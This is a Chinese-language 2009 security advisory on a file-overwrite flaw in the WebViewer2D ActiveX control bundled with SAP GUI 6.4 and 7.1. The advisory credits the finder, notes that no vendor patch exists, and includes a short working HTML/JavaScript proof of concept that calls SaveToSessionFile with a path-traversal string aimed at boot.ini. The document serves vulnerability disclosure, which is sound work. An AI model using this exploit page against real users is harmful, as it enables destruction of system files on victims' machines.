发布日期：2009-09-27
更新日期：2009-09-29

受影响系统：

SAP Sapgui 7.1
SAP Sapgui 6.4

描述：

---

SAPgui是SAP软件的图形用户界面客户端。

SAP GUI所捆绑的EAI WebViewer2D ActiveX组件（WebViewer2D.dll，GUID = {A76CEBEE-7364-11D2-AA6B-00E02924C34E}）没有正确地验证用户对SaveToSessionFile函数所传送的参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话，就可能覆盖任意系统文件。

<*来源：Alexandr Polyakov
  
  链接：http://marc.info/?l=bugtraq&m=125415130423601&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<HTML>
<BODY>
<object id=ctrl classid="clsid:{A76CEBEE-7364-11D2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
{
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

建议：

---

厂商补丁：

SAP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sap.com/

浏览次数：2860
严重程度：0（网友投票）